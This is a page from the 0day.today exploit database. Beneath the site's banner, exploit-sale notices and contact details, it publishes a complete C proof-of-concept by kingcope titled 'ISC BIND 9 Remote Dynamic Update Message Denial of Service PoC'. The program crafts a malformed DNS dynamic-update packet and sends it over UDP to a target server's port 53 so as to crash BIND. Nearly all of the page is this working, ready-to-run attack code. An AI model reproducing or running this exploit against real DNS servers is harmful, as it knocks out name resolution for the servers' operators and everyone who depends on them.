0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC

Author

kcope

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

==============================================================
ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC
==============================================================


/*
    ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC

    by kingcope - this is basically a rewrite of the above, lame i know, but fun enough
    
    for the [zone] argument you can try what is in the named.conf with "type master"
*/
 
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
 
#define PORT 31337
 
struct dnspkt1 {
    unsigned short transact;
    unsigned short flags;
    unsigned short zones;
    unsigned short pr;
    unsigned short updates;
    unsigned short rrs;
};
 
struct dnspkt2 {
    unsigned short type;
    unsigned short class;
    unsigned short name2;
    unsigned short type2;
    unsigned short class2;
    unsigned short ttl1;
    unsigned short ttl2;
    unsigned short datalen;
    unsigned short name3;
    unsigned short type3;
    unsigned short class3;
    unsigned short ttl3;
    unsigned short ttl4;
    unsigned short datalen2;
};
 
int packdomain(char * dest, const char *src)
{
  int i,n,cnt;
 
  n=strlen(src);
  dest[n+1]=0;  // terminator
 
  cnt=0;
  for (i=n; i>0; i--)
  {
    if (src[i-1]=='.')
    {
      dest[i]=cnt;
      cnt=0;
    }
    else
    {
      dest[i]=src[i-1];
      cnt++;
    }
  }
  dest[0]=cnt;
  return n+2;
}
 
int main(int argc, char **argv) {
    int sockfd, clilen;
    struct sockaddr_in serv_addr, cli_addr;
    struct dnspkt1 d1;
    struct dnspkt2 d2;
 
    printf("ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC\n");
    printf("Based on:\n");
    printf("http://www.securityfocus.com/data/vulnerabilities/exploits/35848.txt\n");
    printf("by kingcope - this is basically a rewrite of the above, lame i know, but fun tough\n");
 
    if (argc < 2) {
        printf("usage: %s <host> [zone]\n", argv[0]);
        return 0;
    }
 
        sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sockfd < 0) {
                printf("error on socket() call");
                return -1;
        }
 
        memset(&serv_addr, '\0', sizeof(serv_addr));
        serv_addr.sin_family = AF_INET;
        serv_addr.sin_addr.s_addr = INADDR_ANY;
        serv_addr.sin_port = htons(PORT);
 
        if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) {
                printf("error binding socket\n");
                return -1;
        }
    
        memset(&cli_addr, '\0', sizeof(cli_addr));
        cli_addr.sin_family = AF_INET;
        cli_addr.sin_addr.s_addr = inet_addr(argv[1]);
        cli_addr.sin_port = htons(53);
    
    memset(&d1, '\0', sizeof(d1));
    memset(&d2, '\0', sizeof(d2));
    d1.transact = htons(0x1cd6);
    d1.flags = htons(0x2800);
    d1.zones = htons(0x0001);
    d1.pr = htons(0x0001);
    d1.updates = htons(0x0001);
    d1.rrs = 0;
    char *name = (char*)malloc(8096);
    char nam[1024];
 
    if (argc < 3) {
        /* Not sure if this is right to set as default, have no clue about dns proto
           It works for me.. */
        strcpy(nam, "127.in-addr.arpa");
    } else {
        strncpy(nam, argv[2], sizeof(nam));
        nam[sizeof(nam)-1]=0;
    }
 
    int n=packdomain(name, (char*)nam);
    d2.type = htons(0x0006);
    d2.class = htons(0x0001);
    d2.name2 = htons(0xc00c);
    d2.type2 = htons(0x00ff);
    d2.class2 = htons(0x0001);
    d2.datalen = 0;
    d2.name3 = htons(0xc00c);
    d2.type3 = htons(0x00ff);
    d2.class3 = htons(0x00ff);
    d2.ttl1 = 0;
    d2.ttl2 = 0;
    d2.ttl3 = 0;
    d2.ttl4 = 0;
    d2.datalen2 = 0;
 
    char buffer[10000];
    memcpy(buffer, &d1, sizeof(d1));
    memcpy(buffer+sizeof(d1), name, n);
    memcpy(buffer+sizeof(d1)+n, &d2, sizeof(d2));
 
    clilen=sizeof(cli_addr);
    
    sendto(sockfd, buffer, sizeof(d1)+sizeof(d2)+n, 0, (struct sockaddr *)&cli_addr, sizeof(cli_addr));
    printf("aight!\n");
    return 0;
}




#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC

Report Error

Report Error